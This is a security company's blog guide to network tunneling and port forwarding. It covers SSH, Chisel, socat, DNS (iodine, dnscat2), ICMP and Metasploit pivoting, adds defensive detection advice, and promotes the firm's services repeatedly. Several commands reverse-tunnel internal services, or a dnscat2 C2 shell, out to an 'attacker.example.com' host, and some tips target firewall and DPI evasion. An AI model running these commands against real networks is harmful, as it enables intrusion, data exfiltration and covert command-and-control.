Date: August 17, 2025
Author: Karan Patel, CEO

Network tunneling and port forwarding are foundational techniques in both offensive security and legitimate systems administration. Whether you are bypassing restrictive firewall rules, pivoting through compromised networks, or securely exposing internal services, understanding how these mechanisms work at a technical level is essential.

This guide breaks down the core concepts, real-world usage, and security implications of tunneling and port forwarding, with practical commands you can reference directly.

What Is Port Forwarding and Why Does It Matter?

Port forwarding is the process of redirecting traffic from one IP address and port combination to another. It allows services running on internal or otherwise inaccessible hosts to be reached through an intermediary.

There are three primary types:

  • Local Port Forwarding forwards a port on your local machine to a remote destination through a relay host.
  • Remote Port Forwarding exposes a port on the remote server back to a local machine or internal network.
  • Dynamic Port Forwarding turns an SSH connection into a SOCKS proxy, routing all traffic dynamically through the tunnel.

These techniques are used every day by developers, system administrators, and penetration testers alike. When misused, they also form a critical component of post-exploitation and lateral movement in adversarial environments.

SSH Tunneling: The Most Common Tunneling Method

SSH (Secure Shell) is the most widely used protocol for tunneling because it is encrypted, available on nearly every Unix-based system, and highly flexible.

Local Port Forwarding with SSH

The following command forwards local port 8080 to port 80 on an internal server, routed through a jump host:

ssh -L 8080:192.168.1.100:80 user@jump-host.example.com -N

Breaking this down:

  • -L 8080:192.168.1.100:80 binds local port 8080 and forwards it to 192.168.1.100:80
  • user@jump-host.example.com is the SSH relay host
  • -N tells SSH not to execute a remote command, keeping the tunnel alive without an interactive shell

After running this, visiting http://localhost:8080 in your browser will load the content from 192.168.1.100:80 as seen from the jump host.

Remote Port Forwarding with SSH

Remote forwarding is particularly powerful in penetration testing scenarios where you need to expose an internal service to an external attacker-controlled machine:

ssh -R 9090:localhost:3306 attacker@attacker.example.com -N

This command opens port 9090 on the remote attacker machine and tunnels it back to port 3306 (MySQL) on the local machine. This is commonly used during red team engagements to access database services that are otherwise unreachable from the internet.

Dynamic Port Forwarding and SOCKS Proxy

Dynamic port forwarding creates a SOCKS5 proxy through the SSH connection:

ssh -D 1080 user@jump-host.example.com -N

Once this is running, configure your browser or tool to use 127.0.0.1:1080 as a SOCKS5 proxy. This routes all traffic through the jump host, allowing full network access to the internal environment. Tools like proxychains can be configured to route command-line tools through this tunnel:

# /etc/proxychains.conf
socks5 127.0.0.1 1080

Then run any tool through the proxy:

proxychains nmap -sT -Pn 192.168.1.0/24

This is a common pivot technique during internal network assessments. If your organization needs a thorough review of how these techniques could be used against your environment, the team at Redfox Cybersecurity offers comprehensive penetration testing services at https://redfoxsec.com/services.

Chisel: Tunneling Over HTTP

In environments where SSH is blocked but HTTP or HTTPS traffic is allowed, Chisel is a popular tool for establishing tunnels. It operates as an HTTP-based tunnel with a client-server model.

Setting Up a Chisel Server

On the attacker or relay machine:

./chisel server --port 8000 --reverse

The --reverse flag enables reverse tunneling from clients back to the server.

Connecting with the Chisel Client

On the compromised or internal host:

./chisel client http://attacker.example.com:8000 R:3389:127.0.0.1:3389

This creates a reverse tunnel, exposing RDP (port 3389) from the internal machine to the attacker's Chisel server on port 3389. This technique is frequently observed during red team operations to pivot into Windows environments.

Chisel SOCKS Proxy

Chisel also supports dynamic SOCKS proxying:

# Server side
./chisel server --port 8000 --reverse

# Client side
./chisel client http://attacker.example.com:8000 R:socks

This opens a SOCKS5 listener on port 1080 (by default) on the server side, allowing full network pivoting through the compromised host.

Netcat-Based Port Forwarding

Netcat (nc) is a simple but powerful utility available on most Linux systems. While it does not encrypt traffic, it is useful for quick, temporary port forwarding in controlled environments.

Basic Netcat Relay

mkfifo /tmp/pipe
nc -lvp 4444 < /tmp/pipe | nc 192.168.1.100 80 > /tmp/pipe

This creates a bidirectional relay: traffic arriving on port 4444 is forwarded to 192.168.1.100:80 and responses are piped back. It is unencrypted and fragile, but effective for rapid prototyping or CTF-style scenarios.

Socat for Advanced Port Forwarding

socat is a more capable alternative to Netcat that supports SSL, file descriptors, and complex relays.

TCP Port Relay with Socat

socat TCP-LISTEN:8080,fork TCP:192.168.1.100:80

The fork option ensures that each incoming connection spawns a new process, allowing multiple simultaneous connections through the relay.
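To make concrete what the Netcat/mkfifo relay and the socat TCP-LISTEN,fork relay above actually do, here is an added example (not code from the original article, and not part of either tool): a minimal threaded TCP relay in Python. It accepts a connection on a listen port, opens a connection to a destination, and copies bytes in both directions, with one handler thread per accepted connection playing the role of socat's fork. The echo server, the 127.0.0.1 addresses and the OS-chosen port 0 are assumptions made so the example runs offline; a real relay would point dest at the internal service.

```python
"""Added example, not code from the original article: a minimal threaded
TCP port relay. It does in Python what `socat TCP-LISTEN:8080,fork
TCP:host:80` and the netcat/mkfifo relay do: accept a connection on a
listen port and copy bytes both ways to a destination. One handler thread
per accepted connection plays the role of socat's `fork`. The echo server
is a constructed stand-in for the internal service; 127.0.0.1 and port 0
(OS-chosen) are assumptions so the example runs offline."""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src reaches EOF, then half-close dst so
    the far side sees the same EOF (this preserves request/response
    framing for protocols that rely on the close)."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _handle(client, dest):
    """Open the outbound leg for one client and pump both directions."""
    try:
        upstream = socket.create_connection(dest, timeout=5)
    except OSError:
        client.close()
        return
    back = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    back.start()
    _pump(client, upstream)
    back.join()
    client.close()
    upstream.close()


def _serve(lsock, handler):
    """Accept loop: one daemon thread per connection (socat's fork)."""
    while True:
        try:
            conn, _ = lsock.accept()
        except OSError:
            return
        threading.Thread(target=handler, args=(conn,), daemon=True).start()


def _listen(host, port):
    lsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    lsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    lsock.bind((host, port))
    lsock.listen(16)
    return lsock


def start_relay(listen_host, listen_port, dest):
    """Start the relay in the background; return the (host, port) it bound."""
    lsock = _listen(listen_host, listen_port)
    threading.Thread(target=_serve, args=(lsock, lambda c: _handle(c, dest)),
                     daemon=True).start()
    return lsock.getsockname()


def start_echo_server(host="127.0.0.1"):
    """Constructed stand-in for the internal service: echoes bytes back."""
    def echo(conn):
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)
    ssock = _listen(host, 0)
    threading.Thread(target=_serve, args=(ssock, echo), daemon=True).start()
    return ssock.getsockname()


def roundtrip(relay_addr, payload):
    """Send payload through the relay, half-close, and collect the reply."""
    with socket.create_connection(relay_addr, timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        out = b""
        while True:
            data = s.recv(4096)
            if not data:
                break
            out += data
    return out


def concurrent_roundtrips(relay_addr, payloads):
    """Several clients at once, to show the per-connection handler threads."""
    results = [None] * len(payloads)

    def one(i):
        results[i] = roundtrip(relay_addr, payloads[i])
    threads = [threading.Thread(target=one, args=(i,)) for i in range(len(payloads))]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    return results


if __name__ == "__main__":
    echo_addr = start_echo_server()
    relay_addr = start_relay("127.0.0.1", 0, echo_addr)
    print(concurrent_roundtrips(relay_addr, [b"one", b"two", b"three"]))
```

The half-close in _pump is the detail that the one-line netcat relay gets wrong: without propagating EOF in each direction separately, a client that sends a request and shuts down its write side never receives the response, which is one reason the mkfifo version is described as fragile.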

SSL-Wrapped Tunnel with Socat

socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:127.0.0.1:8080

This wraps plaintext traffic in SSL, making it appear as HTTPS to any intermediate inspection device. This technique is often used to evade deep packet inspection (DPI) firewalls.

If your infrastructure may be vulnerable to tunneling-based evasion, Redfox Cybersecurity can assess your network defenses and firewall posture. Explore their services at https://redfoxsec.com/services.

DNS Tunneling: Exfiltration Through Port 53

DNS tunneling encodes data inside DNS query and response packets to bypass firewalls that allow DNS traffic unrestricted. It is one of the more covert tunneling techniques and is commonly associated with data exfiltration and command-and-control (C2) communication.

How DNS Tunneling Works

Tools like iodine and dnscat2 are commonly used to establish DNS tunnels.

Setting up an iodine server:

iodined -f -c -P secretpassword 10.0.0.1 tunnel.attacker.example.com

Connecting with the iodine client:

iodine -f -P secretpassword tunnel.attacker.example.com

Once the tunnel is established, a virtual network interface (dns0) is created on both ends, allowing arbitrary IP traffic to flow through DNS packets. This is stealthy because port 53 UDP is almost universally permitted through firewalls.

dnscat2 for Command and Control

dnscat2 is specifically designed for C2 over DNS:

# Server (on authoritative DNS server for your domain)
ruby dnscat2.rb tunnel.attacker.example.com

# Client (on compromised host)
./dnscat2 tunnel.attacker.example.com

From the server, you get an interactive shell session through DNS. Traffic is encrypted by default using a pre-shared key, making it difficult to detect even with DNS logging in place.

ICMP Tunneling

ICMP (Internet Control Message Protocol) is another protocol frequently permitted through firewalls. Tools like ptunnel wrap TCP traffic inside ICMP echo request and reply packets.

# Server
ptunnel -x secretpassword

# Client
ptunnel -p server.example.com -lp 8080 -da 192.168.1.100 -dp 80 -x secretpassword

This makes a connection to 192.168.1.100:80 appear as ICMP ping traffic to any monitoring system. ICMP tunneling has lower bandwidth and higher latency than TCP-based methods, but its stealthiness makes it a valuable technique in restricted environments.

Metasploit Port Forwarding During Post-Exploitation

During penetration tests using Metasploit Framework, port forwarding can be configured directly from a Meterpreter session to pivot deeper into a network:

# Inside a Meterpreter session
meterpreter > portfwd add -l 3306 -p 3306 -r 192.168.10.50

This forwards local port 3306 to port 3306 on an internal host visible only from the compromised machine. After setting this up, tools like mysql can connect directly from the attacker machine:

mysql -h 127.0.0.1 -P 3306 -u root -p

Metasploit also supports SOCKS proxying through a compromised host using the auxiliary/server/socks_proxy module:

msf6 > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set SRVPORT 1080
msf6 auxiliary(server/socks_proxy) > set VERSION 5
msf6 auxiliary(server/socks_proxy) > run

Combined with proxychains, this allows the attacker to route arbitrary tools through the compromised network segment, a technique central to internal network lateral movement.

Red team engagements that test these exact pivot and tunneling techniques are a core capability of Redfox Cybersecurity. Their adversary simulation services are available at https://redfoxsec.com/services.

Detecting and Defending Against Unauthorized Tunneling

Understanding how tunneling works also informs how to defend against it. Common detection and mitigation strategies include:

Network-Level Controls

Blocking outbound SSH (port 22) to arbitrary internet hosts limits opportunistic tunneling. Enforcing DNS resolution through internal resolvers and monitoring DNS query volume and entropy can surface DNS tunneling activity. Restricting ICMP to monitoring purposes only reduces ICMP tunnel viability.

Deep Packet Inspection

Modern next-generation firewalls (NGFWs) perform application-layer inspection that can detect SSH tunneling even when it uses port 443 or other permitted ports by analyzing handshake patterns and traffic behavior.

Endpoint Detection

Monitoring process trees and network socket activity on endpoints can reveal tools like Chisel, iodine, or dnscat2 running as unexpected processes. EDR solutions that capture network behavior at the process level are particularly effective here.

Logging and Anomaly Detection

Large volumes of DNS queries to a single external domain, ICMP packets with unusual payloads, or long-lived TCP sessions over unusual ports are all indicators that can be surfaced through SIEM correlation rules.
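The two DNS signals named above (query volume per domain and entropy of the queried names) are simple enough to implement directly. The following is an added example, not code from the original article or from any SIEM product: it parses a constructed query log, aggregates by registered domain, and flags domains with many queries whose subdomain labels are long and high-entropy, the shape iodine- and dnscat2-style tunnels produce. The log format (timestamp, client, qname, qtype), the thresholds, and the "last two labels" definition of registered domain are assumptions; a production rule would use the public suffix list and tune thresholds against baseline traffic.

```python
"""Added example (not from the original article): flag DNS tunneling
candidates from query logs using query volume per registered domain and
Shannon entropy of the subdomain labels. Log lines are constructed; the
line format (timestamp client qname qtype) is an assumption, not any
particular resolver's format."""
import hashlib
import math
from collections import Counter, defaultdict


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character of text (0.0 for empty or uniform)."""
    if not text:
        return 0.0
    n = len(text)
    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def registered_domain(qname: str) -> str:
    """Last two labels of the name. Simplification: a real tool would use
    the public suffix list so suffixes like co.uk are handled."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def parse_line(line: str):
    """Parse 'timestamp client qname qtype'; return None for malformed lines."""
    parts = line.split()
    if len(parts) != 4:
        return None
    ts, client, qname, qtype = parts
    return {"ts": ts, "client": client, "qname": qname, "qtype": qtype}


def summarize(lines):
    """Per registered domain: query count, mean subdomain entropy and length."""
    stats = defaultdict(lambda: {"queries": 0, "entropy_sum": 0.0, "len_sum": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        dom = registered_domain(rec["qname"])
        # Everything left of the registered domain, dots removed, is the
        # part a tunnel uses to carry encoded data.
        sub = rec["qname"].lower()[:-len(dom)].rstrip(".").replace(".", "")
        s = stats[dom]
        s["queries"] += 1
        s["entropy_sum"] += shannon_entropy(sub)
        s["len_sum"] += len(sub)
    return {
        dom: {
            "queries": s["queries"],
            "mean_entropy": s["entropy_sum"] / s["queries"],
            "mean_subdomain_len": s["len_sum"] / s["queries"],
        }
        for dom, s in stats.items()
    }


def flag_tunnel_candidates(lines, min_queries=20, entropy_threshold=3.0,
                           len_threshold=30):
    """Domains with a high query count and long or high-entropy subdomains.
    Thresholds are assumed starting points, to be tuned against baseline."""
    flagged = []
    for dom, s in summarize(lines).items():
        if s["queries"] >= min_queries and (
            s["mean_entropy"] >= entropy_threshold
            or s["mean_subdomain_len"] >= len_threshold
        ):
            flagged.append(dom)
    return sorted(flagged)


def constructed_log(tunnel_queries=50):
    """Constructed sample: a few ordinary lookups, one malformed line, and a
    burst of long pseudo-random labels under one domain."""
    lines = [
        "2025-08-17T10:00:01 10.0.0.5 www.example.com A",
        "2025-08-17T10:00:02 10.0.0.5 mail.example.com MX",
        "2025-08-17T10:00:03 10.0.0.7 cdn.example.net A",
        "garbage line that should be skipped",
    ]
    for i in range(tunnel_queries):
        # Deterministic hex stands in for encoded tunnel payload chunks.
        label = hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40]
        lines.append(f"2025-08-17T10:01:{i % 60:02d} 10.0.0.9 "
                     f"{label}.t.tunnel-example.org TXT")
    return lines


if __name__ == "__main__":
    log = constructed_log()
    for dom, s in summarize(log).items():
        print(f"{dom:22s} queries={s['queries']:3d} "
              f"entropy={s['mean_entropy']:.2f} len={s['mean_subdomain_len']:.1f}")
    print("flagged:", flag_tunnel_candidates(log))
```

Volume alone is a weak signal (CDNs and telemetry domains are queried constantly), and entropy alone catches cache-busting hostnames, which is why the rule requires both a high count and long or high-entropy labels; TXT and NULL record types, which tunnels favour for their larger response size, are a useful third dimension to add from the qtype field.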

If you want an expert evaluation of how well your defenses hold up against real tunneling and evasion techniques, Redfox Cybersecurity provides detailed security assessments tailored to your environment at https://redfoxsec.com/services.

Key Takeaways

Tunneling and port forwarding are versatile, powerful techniques that sit at the intersection of legitimate network administration and advanced adversarial tradecraft. SSH tunnels, Chisel over HTTP, DNS and ICMP tunneling, and Metasploit pivoting each serve a distinct purpose and excel in different environmental constraints.

For defenders, the priority is understanding the techniques attackers use so that the right detection controls can be put in place. For penetration testers and red teamers, mastering these methods is non-negotiable for realistic internal assessments.

Whether you are hardening your network against tunneling-based attacks or need professionals to simulate exactly these techniques against your infrastructure, Redfox Cybersecurity has the expertise to help. Visit https://redfoxsec.com/services to learn more about their offensive and defensive security service offerings.
